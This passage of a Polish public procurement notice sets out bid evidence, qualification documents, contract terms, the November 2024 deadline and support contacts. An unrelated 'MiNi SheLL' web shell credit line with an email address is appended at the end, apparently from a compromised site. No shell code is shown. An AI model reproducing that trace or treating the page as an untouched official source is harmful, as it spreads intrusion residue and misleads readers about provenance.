elektrycznych i <br/>elektroenergetycznych ww. <br/>Przed podpisaniem umowy wykonawca jest zobowiązany przedstawić ww. <br/>dokumenty lub kserokopie dokumentów poświadczonych za zgodność z <br/>oryginałem. <br/>UWAGA: Wymaganie określonych uprawnień do pełnienia samodzielnych funkcji <br/>technicznych w budownictwie na podstawie przepisów ustawy z dnia 7 lipca 1994 r. <br/>Prawo budowlane oraz rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia <br/>2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji <br/>technicznych w budownictwie, rozumie przez to również odpowiadające im ważne <br/>uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów <br/>prawa lub odpowiednich przepisów obowiązujących na terenie kraju, w którym <br/>wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ <br/>zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach <br/>członkowskich Unii Europejskiej. <br/>2. Postanowienia uzupełniające <br/>1) <br/>Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie <br/>posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych <br/>interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych <br/>Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny <br/>wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia <br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień <br/>złożenia ofert następujących podmiotowych środków dowodowych: <br/>15 <br/>a) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy <br/>wymagają wpisu do rejestru lub ewidencji. - <br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami <br/>Rzeczypospolitej Polskiej, zamiast dokumentu jak wyżej, składa dokument lub <br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce <br/>zamieszkania, potwierdzające, że nie otwarto jego likwidacji, nie ogłoszono upadłości, <br/>jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego <br/>działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju <br/>sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia <br/>tej procedury. - <br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub <br/>miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o <br/>których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio <br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego <br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod <br/>przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania <br/>nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub <br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, <br/>właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. - <br/>Dokumenty/oświadczenia, o których mowa powyżej powinny być wystawione nie <br/>wcześniej niż 3 miesiące przed upływem terminu składania ofert. <br/>b) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego <br/>2007 16 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z <br/>innym wykonawcą, który złożył odrębną ofertę albo oświadczenia o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy <br/>kapitałowej – wzór oświadczenia stanowi Załącznik nr 5 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia <br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień <br/>złożenia, następujących podmiotowych środków dowodowych: <br/>a ) Wykaz wymaganej liczby robót budowlanych, porównywalnych z robotami <br/>budowlanymi stanowiącymi przedmiot zamówienia, wykonanych nie wcześniej niż w <br/>okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotu, <br/>na rzecz którego roboty te zostały wykonane, oraz z załączeniem dowodów określających, <br/>czy roboty budowlane zostały wykonane należycie, to jest: referencji bądź innych <br/>dokumentów sporządzonych przez podmiot, na rzecz którego roboty budowlane zostały <br/>wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać <br/>16 <br/>tych dokumentów - inne odpowiednie dokumenty. Wykaz robót winien zawierać pozycje <br/>które potwierdzają spełnianie warunku udziału w postępowaniu-– doświadczenie. Wzór <br/>wykazu został załączony do SWZ – załącznik nr 3. <br/>b) <br/>Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia <br/>publicznego – wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, <br/>doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a <br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do <br/>dysponowania tymi osobami - zgodny ze wzorem stanowiącym załącznik nr 4 do SWZ. <br/>c) <br/>Dokumenty potwierdzające, że Wykonawca jest ubezpieczony od <br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z <br/>przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia nie <br/>niższą niż określoną przez zamawiającego w zapisach SWZ, w tym dowodu opłacenia <br/>składki. - Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganego przez <br/>Zamawiającego dokumentu, o którym mowa w pkt c), składa inne podmiotowe środki <br/>dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez <br/>zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub <br/>finansowej. <br/>4. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o <br/>udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać <br/>Wykonawców do złożenia wszystkich lub niektórych dokumentów potwierdzających, <br/>że nie podlegają wykluczeniu, spełniają warunki udziału w postępowaniu, a jeżeli <br/>zachodzą uzasadnione podstawy do uznania, że złożone uprzednio oświadczenia lub <br/>dokumenty nie są już aktualne, do złożenia aktualnych oświadczeń lub dokumentów. <br/>5. Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe <br/>środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać <br/>Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych <br/>środków dowodowych, aktualnych na dzień ich złożenia. <br/>6. Jeżeli złożone przez Wykonawcę oświadczenie, o którym mowa w art. 125 ust. 1 ustawy <br/>Pzp, lub podmiotowe środki dowodowe budzą wątpliwości Zamawiającego, może on <br/>zwrócić się bezpośrednio do podmiotu, który jest w posiadaniu informacji lub <br/>dokumentów istotnych w tym zakresie dla oceny spełniania przez wykonawcę <br/>warunków udziału w postępowaniu, kryteriów selekcji lub braku podstaw <br/>wykluczenia, o przedstawienie takich informacji lub dokumentów. <br/>7. Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści oświadczenia, <br/>o którym mowa w art.125 ust.1 ustawy, lub złożonych podmiotowych środków <br/>dowodowych lub innych dokumentów lub oświadczeń składanych w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedstawienia przedmiotowych środków dowodowych przez Wykonawcę. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zamawiający wymaga, aby w przypadku<br/>powierzenia części zamówienia Podwykonawcom, Wykonawca wskazał w ofercie części<br/>zamówienia, których wykonanie zamierza powierzyć Podwykonawcom oraz podał (o ile<br/>są mu wiadome na tym etapie) nazwy/firmy Podwykonawców- Załącznik nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> a) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim<br/>przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty<br/>b) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które części zamówienia wykonają poszczególni<br/>Wykonawcy- w treści interaktywnego formularza ofertowego.<br/>c) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 oraz art. 109<br/>ust. 1 pkt 4,5,7,8,10 Pzp, natomiast spełnianie warunków udziału w postępowaniu<br/>Wykonawcy wykazują zgodnie z cz. VIII pkt 1 SWZ.<br/>d) Wszyscy Wykonawcy składają oświadczenia potwierdzające brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału, w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu – Zał. Nr 2 do<br/>SWZ.<br/>e) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni<br/>zobowiązani, na wezwanie Zamawiającego złożyć; aktualne na dzień złożenia<br/>podmiotowe środki dowodowe – cz. IX 1,2,3.<br/>f) Podmiotowe środki dowodowe, o których mowa w cz. IX.3 składa odpowiednio<br/>Wykonawca/Wykonawcy, który/którzy wykazuje/wykazują spełnianie warunku. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami zał. nr 7 do SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-11-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma eZamówienia pod adresem: https://ezamowienia.gov.pl. Wykonawca przygotowuje ofertę przy pomocy interaktywnego &#34;Formularza ofertowego&#34; udostępnionego przez Zamawiającego na Platformie eZamówienia i zamieszczonego w podglądzie postępowania w zakładce &#34;Informacje podstawowe&#34;. Sposób złożenia oferty opisany na stronie https://ezamowienia.gov.pl/pl/komponent-edukacyjny.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-11-29 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> W związku ze zmianami po stronie Profilu Zaufanego od dnia 10 maja 2024 r. nie ma możliwości podpisywania Podpisem Zaufanym interaktywnego formularza ofertowego, tak jak do tej pory. Aby podpisać formularz ofertowy pobrany z Platformy e-Zamówienia należy po pobraniu i wypełnieniu formularza zapisać go w wersji nieedytowalnej i następnie podpisać Podpisem Zaufanym.<br/><br/>W razie problemów z Podpisem Zaufanym uprzejmie prosimy o kontakt z ePUAPem:<br/><br/>telefon: + 48 (42) 253 54 50 (czynny od poniedziałku do piątku w godzinach: 7:00 – 18:00)<br/>e-mail: pz-pomoc@coi.gov.pl lub epuap-pomoc@coi.gov.pl<br/><br/>W sprawach związanych z formularzem ofertowym uprzejmie prosimy o kontakt z Infolinią Platformy e-Zamówienia:<br/><br/>telefon: + 48 (22) 458 77 99 (czynny od poniedziałku do piątku w godzinach: 08:15-16:15).

Creat By MiNi SheLL
Email: jattceo@gmail.com